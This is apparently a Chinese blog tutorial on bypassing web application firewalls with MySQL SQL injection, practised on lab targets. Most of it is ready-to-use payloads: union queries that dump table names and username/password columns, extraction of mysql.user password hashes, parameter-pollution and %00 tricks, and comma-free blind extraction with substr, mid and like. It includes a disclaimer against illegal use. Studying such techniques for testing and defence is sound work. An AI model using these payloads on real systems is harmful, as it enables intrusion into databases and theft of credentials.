web安全之SQL注入绕过技术(二)

最新推荐文章于 2024-04-08 10:41:33 发布
最新推荐文章于 2024-04-08 10:41:33 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: WEB安全 文章标签: web安全 SQL注入 绕过技术 MYSQL 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/123119356
版权

文中详细讲解web安全之SQL注入的绕过技术,通过文中内容更加深入的掌握SQL注入绕过技术原理及使用方法,从而更好的用于渗透测试中;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

SQL注入绕过技术(二)

联合查询手工注入语法

爆出所有表

?name='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+&submit=1

爆出user表中所有字段

?name='union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+&submit=1

爆出字段中username passowrd的值

?name='union select 1,group_concat(username,0x3a,password) from users--+&submit=1

0x3a是冒号的编码 ,便于区分两个值

添加库名绕过

在日常中,有的时候WAF的拦截规则并不能拦截[库名].[表名]这种模式,所以我们就可以利用这个来进行绕过:

?name='union select 1,(select group_concat(user,authentication_string) from mysql.user)--+&submit=1

这里是查看表中所有数据:
在这里插入图片描述
如果在浏览器中使用concat,那么就需要表后面跟上limit 1,否则会报错:

?name='union select 1,(select concat(user,authentication_string) from mysql.user limit 1)--+&submit=1

这样就可以只查看一行。
在这里插入图片描述
从上面就可以看出,当WAF上没有对这种方式进行限制时,我们则可以利用此方法跨库查看其中的表。
在这里插入图片描述

limit的用法

limit 0,1 #作用和limit 1相同 
limit 1,1 #相当于查看这个表中的第二个数据 2,1 3,1 4,1 就是第三个 第四个 依此类推
limit 2 #查看表中前二个数据 3,4,5 依此类推

不过添加库名绕过方法,经测试只能查看mysql数据库内的表,其余库并不能查看:
在这里插入图片描述
从图中可以看出 我已在pichaku库中创建的user表且放入数据,但当跨库查看mysql时,可以查看,切换至moonsec库,同样可以查看,但查看pikachu中的user表则报错。
在这里插入图片描述

去重复绕过

在mysql查询可以使用distinct 去除查询的重复值。可以利用这点突破 waf 拦截来实现绕过:

select * from users where id=-1 union distinct select 1,2,3,4;

在这里插入图片描述
在浏览器中同样可以实现:

?name='union distinct select 1,user()--+&submit=1

在这里插入图片描述
使用all同样可以替换distinct。这个all或者distinct 写在union select中间或后面都可以。

反引号绕过

在mysql中同样可以使用反引号来突破waf来实现绕过:

?name='union select 1,(select version() from `users` limit 1)--+&submit=1

在这里插入图片描述

脚本语言特性绕过

在PHP中我们可以利用脚本语言的特性使用id=1&id=2,作用是后面的值会覆盖前面的值,从而突破waf实现绕过:
%00是截断,当WAF匹配到%00时,则会自动截断,从而不检测后面的内容,所以我们后面在使用SQL语句就可以成功获取数据。

?name=%00&name='union select 1,version()--+&submit=1

在这里插入图片描述
其他的语言同样也具备这样的特性绕过。

逗号绕过

因为在我们常规的注入中,是肯定会使用到逗号的,所以很多WAF就对逗号进行了拦截:
当我们使用substr这个函数的时候,则可以通过枚举的方式来获取数据库中的信息,从而突破waf实现绕过:

substr绕过

select (substr(database() from 1 for 1));

在这里插入图片描述
这样我们就可以通过枚举的方式获取信息,和limit一样,2 for 1 就显示第二位:
在这里插入图片描述
我们将这个语句拿到浏览器中执行:

?name=vince' and (select(substr(database() from 1 for 1)))='m'--+&submit=1

不是当前数据库的字母时,则返回错误页面:
在这里插入图片描述
是当前数据库的字母时,则返回正确页面:
在这里插入图片描述
同样为了防止过滤单引号,我们可以使用hex转换16进制来绕过:

?name=vince' and (select(substr(database() from 1 for 1)))=0x70--+&submit=1

在这里插入图片描述

mid绕过

mid的作用和substr函数功能相同,当如果substr被拦截或过滤,我们可以使用mid这个函数来代替:

?name=vince' and (select(mid(database() from 1 for 1)))=0x70--+&submit=1

在这里插入图片描述

like绕过

使用like同样是可以不使用逗号进行绕过:

?name=vince'and (select database() like  '%a%')--+&submit=1

当数据库中存在这个字母,则返回正确页面:
在这里插入图片描述
当数据库中没有这个字母,则返回错误页面:
在这里插入图片描述

全局变量Global
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入绕过实战案例
08-31
SQL注入(SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种攻击通常发生在开发者未能充分验证用户输入的情况下。例如,一个简单的登录表单,如果未对...
第十三节 SQL注入绕过技术-01
09-15
SQL 注入绕过技术是攻击者用来绕过安全措施的常见方法。为了防止 SQL 注入攻击,开发者必须采取多种安全措施,包括输入验证、输出编码、参数化查询和限制权限等。同时,开发者也应该了解 SQL 注入绕过技术,以便更好...
substr是不安全
weixin_30755393的博客
08-22 118
今天遇到一个问题,数据库中保存的内容通过php在页面无法显示,如果将内容换行或加个空格或者随便加点其他内容就能正常显示。 非常的诡异,显示的内容是通过截取得到的。代码非常简单 substr($pMarketInfo['description'], 0, 150) . '...'; 原始内容是: Set on a huge 809m2 block, there is plenty...
禁用substrsubstring、mid函数的sql注入脚本
weixin_30794851的博客
04-02 265
#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') headers = {...
黑客常用SQL注入绕过技术总结!(冰河吐血整理
最新发布
q16974058的博客
04-08 1127
引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。
网络安全sql注入基础——盲注
垃圾管理员的垃圾站
08-30 955
前言: 继上文《网络安全sql注入基础》 上篇谈到,通过发送一些符合语法的输入,执行特定的sql语句,将查询结果返回到页面。这种查询结果在页面显示的方式,我们称为“回显”。 举个实际的例子,如一登录窗口,输入用户名和密码,成功登录后。一般会在页面上显示“欢迎你,XXX”之类的话语,这个XXX就是你的用户名。而这个XXX也将作为我们注入回显的通道,通过XXX一点点抠出来我们...
特殊的绕过
weixin_45611539的博客
05-16 1680
特殊的绕过 此章会讲一些sql注入的特殊绕过姿势。 此帖实际为笔者的笔记。有些地方是学习了一些大佬的帖子,才写出来的。也算借鉴吧,如果有大佬介意的话,笔者会删除此贴 大佬的绕过技巧 1. 逗号绕过 此题的实例为bugku中web的insert into注入 union的逗号绕过 union的逗号绕过很简单,只需要使用join的方式。就能够绕过逗号 而使用join的方式如下: union select 1,2,3,4; union select * from ((select 1)A join (s
利用正则表达式绕过
lml_0916的博客
07-19 500
这里匹配的时候,以select开头,匹配到了select后,\b匹配的就是边界,\s\S两个在一起使用的话就可以相当于匹配所有字符,“*”匹配0次或者多次;是科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,系统会认为这是两个命令,所以这样既没有报错,同时也绕过了正则。但是也样并没有完全解决。可以看的出来,第列存储的是登录密码,第三列是密码。由于上面出现的问题,我们想要绕过的话,就不让出现边界,也就是改变from的值(但是要保证是个单词,并且需要延长,还不能报错).
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
实验一:使用SQL注入绕过认证 一、实验目的 使用SQL注入绕过认证 熟悉掌握常见的绕过方式 、实验内容 本实验使用SQL注入绕过认证,其中包含注释符绕过、大小写绕过、特殊编码绕过、内联注释绕过等方式。 三、实验...
Web应用安全:使用SQL注入绕过认证.pptx
06-17
使用SQL注入绕过认证 使用SQL注入绕过认证 1、SQL注入分类 SQL注入类型 数字型注入 字符型注入 其他类型注入 使用SQL注入绕过认证 1、SQL注入分类 数字型注入 许多网页链接有类似 /users.php?id=1 的结构,基于此种...
Web应用安全:使用SQL注入绕过方法文本.docx
06-17
Web应用安全:使用SQL注入绕过方法文本.docx
php安全特性函数以及绕过方法
goddemon
12-08 2693
①is_numeric() 作用:检测变量是否为数字或数字字符串 绕方法:16进制会被判断为数字 %00即空格会被判断为非数字–>即直接跳过检测了 绕过方法 如 绕过方法 password=404%00–>即可绕过
常见的SQL注入类型
weixin_49182737的博客
05-22 1万+
sql注入的基本分类
PHP函数绕过
慎铭的博客
02-17 518
md5()   md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。如需计算文件的 MD5 散列,请使用 md5_file() 函数。 语法 md5(string, raw) - string 不可缺省。规定要计算的字符串 - raw 可缺省。规定十六进制或进制的输出格式: - TRUE - 原始 16 字符进制格式 - FALSE - 默认。32 字符十六进制数 - 返回值 如果成功则返回已计算的 MD5 散列,如果失败则返回 FA
SQL注入一些过滤及绕过总结
2301_76786857的博客
12-27 905
过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句基本就不起作用了。(3)既然是过滤关键字,大小写应该都会被匹配过滤,所以大小写绕过一般是行不通的。常见的几种注入方法基本上都要使用逗号,要是逗号被过滤了,那就只能想办法绕过了。(2)对于盲注的那几个函数substr(),mid(),limit。(1)最常用的绕过方法就是用/**/,,分割关键字。(2)根据过滤程度,有时候还可以用双写绕过。(1)简单注入可以使用join方法绕过。(4)有时候还可以使用编码绕过
CTF中常见的php函数绕过(保持更新)
csu_vc的博客
11-03 1万+
is_numeric()用于判断是否是数字,通常配合数值判断is_numeric(@$a["param1"])?exit:NULL; if(@$a["param1"]){ ($a["param1"]>2017)?$v1=1:NULL; } //param1不能是数字,但又要比2017大,利用数组$pos = array_search("nudt",$a["param2"]); $pos ==
统一异常拦截和非法sql拦截
L170311的博客
12-12 1211
知识是引导人生到光明与真实境界的灯烛,愚暗是到达光明与真实境界的障碍,也就是人生发展的障碍。——李大钊
SQL注入漏洞(绕过篇)
errorr0
06-24 4674
SQL注入绕过手法
PHP - 函数绕过 - preg_match()
热门推荐
3569
11-29 1万+
http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/   待绕过目标如下 <?php echo preg_match('/<\?.*[(`;?>].*/is', $_GET['a']); 最常见的绕过 数组 http://localhost/?a...
SQL_BypassWaf.pdf
04-08
SQL_BypassWaf.pdf是一篇关于WAF绕过技术的研究文章,作者是来自ms509团队的...文章通过对WAF的研究,展示了如何通过SQL注入技术绕过WAF的防护,实现对目标系统的攻击,进一步提升了攻击者在网络安全领域的实战能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值